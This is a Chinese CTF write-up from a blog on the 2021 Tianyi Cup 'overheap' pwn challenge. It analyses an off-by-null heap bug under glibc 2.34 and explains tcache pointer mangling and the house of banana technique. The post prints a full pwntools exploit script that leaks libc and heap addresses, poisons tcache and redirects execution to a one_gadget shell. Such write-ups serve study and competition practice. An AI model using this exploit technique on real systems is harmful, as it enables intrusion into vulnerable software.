2021 天翼杯 overheap

已于 2022-01-20 17:16:21 修改
阅读量523 收藏 1
点赞数
分类专栏: CTF 文章标签: 网络安全
于 2022-01-20 17:16:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/121976863
版权

在这里插入图片描述

保护显然

add在这里插入图片描述大小不能超过0x1000

show
在这里插入图片描述
正常

edit
在这里插入图片描述
它的输入函数
在这里插入图片描述
有个off by null。

free
在这里插入图片描述
free函数也正常。

所以说完了就是2.34版本下的一道off by null。

高版本要注意什么
首先是2.32开始对tcache和fastbin的fd指针进行了异或加密,异或的内容其实就是堆地址,所以我们首先必须泄露heap地址。
tcache_entry->next中存放的chunk地址为与自身地址进行异或运算后所得到的值。

2.34开始取消了malloc_hook和free_hook。
我们只能把想法转向IO_FILE。

那么我们来细看
要解决的第一个问题居然是程序跑不了。
在这里插入图片描述
问题在哪呢?
在这里插入图片描述
他给了个他已经patch过的程序。
在这里插入图片描述
IDA也看得出来。

那就把东西都拉进来,然后给他权限。
在这里插入图片描述
就可以了。

所以因为在libc2.34的条件下,我们能利用的方式只有house of banana、house of pig。
这个题里面我们用到的是house of banana。

而且house of banana要注意小细节。
我们在使用house of banana的时候主要是劫持_rtld_global结构体中的link_map结构体,但是我们其实在劫持link_map结构体的时候最重要的是劫持它第一个内容,l_addr结构体,所以其实我们完全可以直接劫持l_addr结构体,也完全可以不用劫持link_map

这次用的就是这个手法。

exp

# -*- coding: utf-8 -*-
from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

pc = "./overheap"

context.binary=pc
context.terminal=["gnome-terminal",'-x','sh','-c']

local = 1
if local:
    r = process(pc)
    elf = ELF(pc)
    libc = elf.libc
    
else:
    r = remote("81.69.230.99",9003)
    elf = ELF(pc)
    libc = ELF("./libc-2.27.so")

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))

def db():
    gdb.attach(r)

def dbs(src):
    gdb.attach(r, src)


def new(size):
    sla('>> ', '1')
    sla(':', str(size))

def show(idx):
    sla('>> ', '2')
    sla(':', str(idx))

def edit(idx,content):
    sla('>> ', '3')
    sla(':', str(idx))
    sla(':', str(content))

def delete(idx):
    sla('>> ', '4')
    sla(':', str(idx))

def exit0():
    sla('>> ', '5')

def xor_ptr(ptr1,ptr2):
    result=((ptr1>>12)^(ptr2))
    return result

new(0x418) #0
new(0x18) #1
new(0x418) #2
new(0x4f8) #3
new(0x18) #4

delete(0)
delete(2)
new(0x418) #0
new(0x418) #2
show(0)


libc_base = u64(r.recv(8))-0x218cc0
heap_base = u64(r.recv(8))-0x6d0
link_map=libc_base+0x260220
one_gadget=libc_base+0xeea9c
_rtld_global = libc_base + 0x25f040
lg("libc_base")
lg("heap_base")
lg("link_map")
lg("one_gadget")
lg("_rtld_global")

edit(2,p64(heap_base+0x6d0)+p64(heap_base+0x6d0)+'\x00'*0x400+p64(0x420))
delete(3)

new(0x88)
new(0x88)
delete(5)
delete(3)
edit(2,p64(xor_ptr(heap_base+0x6e0,link_map))[:-1]+'\n')
new(0x88)
new(0x88)
edit(5,p64(heap_base)+'\n')
new(0x1000)
new(0x1000)
new(0xd00)
new(0xd00)

edit(9,'a'*0x28+p64(one_gadget)+'\n')

exit0()

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
高版本glibc的tcache和fastbin指针加密机制
qq_51474381的博客
04-18 1819
先贴一下源码 tcache: static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); /* Mark this chunk as "in the tcache" so the test in _int_free will detect a
version `GLIBC_2.34‘ not found简单有效解决方法
热门推荐
huazhang_001的博客
02-01 10万+
Error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34’ not found添加一个高级版本系统的源,直接升级libc6.Ubuntu 20.04 - added this repo as described in the link
修改高版本glibc编译出的elf以支持低版本glibc环境客户机执行
w16212的专栏
08-29 2344
修改高版本glibc编译出的elf以支持低版本glibc环境客户机执行
关于version `GLIBC_2.34‘ not found解决办法(非升级glibc库或Linux系统)
YuHWEI的博客
01-19 2万+
指定编译器链接库目录从而解决glibc版本不匹配问题
关于Heap Overflow(堆溢出)
krrrr的专栏
05-04 9309
Heap overflow是一种系统提升权限的方法。在Linux系统中,入侵者可以针对某些文件属性设置成+rws(也就是传说中的粘滞位)的漏洞程序进行攻击从而得到root权限。我们在模拟攻击时可以在root权限下使用以下命令来设置粘滞位属性:                             chown root:root xxx                         
天翼云从业者认证2022
最新发布
04-04
1、天翼云中,创建弹性云主机可以选择不同的计费方式,以便用户适用不同的场景,其中按需付费的计费周期是 A. 月B. 小时C. 分钟D 天
天翼云认证解决方案架构师
12-10
天翼云认证解决方案架构师题库知识点,帮你直接通过天翼云解决方案架构师认证考试。天翼云认证解决方案架构师题库知识点,帮你直接通过天翼云解决方案架构师认证考试。天翼云认证解决方案架构师题库知识点,帮你直接...
天翼云认证考试练习题集(含高级)
06-17
天翼云认证考试练习题集(含高级) 本题集涵盖了天翼云认证考试的高级知识点,涉及到云计算、云存储、云安全、云网络、云数据库等多个方面。下面是对每个问题的详细解释和知识点总结: 1. 天翼云中,两个同一区域...
天翼云GPU驱动安装指南.pdf
07-26
天翼云GPU驱动安装指南 在本文中,我们将详细介绍天翼云GPU驱动安装的流程,包括Windows和Linux两个操作系统下的驱动安装步骤,并对安装后的确认方法进行了详细的介绍。 一、Windows下的驱动安装 在Windows操作...
天翼云oos依赖包
06-26
**天翼云OOS依赖包详解** 天翼云对象存储服务(Object Storage Service,简称OOS)是中国电信推出的一种基于互联网的、大规模、高可用、安全的数据存储服务。它允许用户以低成本、高效率的方式存储和检索大量数据,...
堆内存(Heap)和栈内存(Stack)详解
Lulixue的专栏
01-09 7119
原文地址:http://blog.csdn.net/abcjennifer/article/details/39780819 堆:顺序随意  栈:先进后出  堆和栈的区别  一、预备知识—程序的内存分配  一个由c/C++编译的程序占用的内存分为以下几个部分  1、栈区(stack)— 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等。其操作方式类似
glibc 知:构建2.34版本
canpool
12-20 1万+
文章目录获取版本构建安装 获取版本 主页:https://www.gnu.org/software/libc 这里选择任意一个压缩包下载即可。 构建安装 tar -Jxf glibc-2.34.tar.xz mkdir build install cd build ../glibc-2.34/configure --prefix=/usr make -j4 make install DESTDIR=../install ...
巅峰极客pwn wp
N1rvana的博客
08-17 734
2022巅峰极客pwn wp
2021 祥云 pwn-PassWordBox_ProVersion
z1r0的博客
10-16 231
这里就没有off by null了,size也只能是large bin的,那肯定就是large bin attack了,libc还是2.31的,所以笔者就直接用的ubuntu20.04自带的2.31做的。值得插一嘴的是这个key,笔者上一个free题是因为没注意\x00也会被计算,所以就造成了^ key的值不准确,这题笔者发现了这个问题后,就往后移了一个8字节,保证了key的准确性。这个函数将flags标志位设置为了1配合delete函数即可实现uaf功能。详写了2.31的large bin攻击手法。
2022 网信柏鹭 pwn2 note2
z1r0的博客
09-17 644
因2.34之后取消了malloc,free hook这两个在堆pwn中用的最多的hook,roderick师傅分享的house of apple学习了一下,是一个非常好用的调用链,包括house of emma, house of kiwi, house of banana, house of pig, house of cat都是极好的调用链,前天的网信柏鹭里的pwn2是2.35的,笔者学完apple之后这里拿的2.34做的,只需要改偏移就可以打通2.35的。
PWN学习之house of系列
qq_41071646的博客
08-09 1443
最近 在wiki学习了 house of 这些东西 但是一直都没有找到联系的地方, 然后 在一篇博客上发现了上面有讲东西并且练习题 很好 所以我就拿来联系了一把 并且记录一下 大概思路 house of spirit 这个wiki上好像没有 但是利用方法其实还是差不多的 这个主要就是 fastbin的利用 伪造一个堆块 然后让 free到这个堆块 让 伪造堆块进入...
House of apple 一种新的glibc中IO攻击方法
pythonxxoo的博客
06-18 2933
目录* House of apple 一种新的glibc中IO攻击方法 + 前言 + 利用条件 + 利用原理 + 利用思路 - 思路一:修改线程变量 - 思路二:修改结构体 - 思路三:修改线程变量之 - 思路四:修改全局变量 + 例题分析 - 题目分析 - 利用过程 + 总结提出一种新的中利用思路,暂且命名为。众所周知,高版本逐渐移除了等等一众全局变量,中题对钩子的利用将逐渐成为过去式。而想要在高版本利用成功,基本上就离不开对结构体的伪造与流的攻击。之前很多师傅都提出了一些优秀的攻击方法,比如house
天翼2020_wp_by_LQers
蚁景网安学院
08-05 1551
misc签到curl -H "Range: bytes=6291450000-" --output /dev/stdouthttp://das.wetolink.com...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值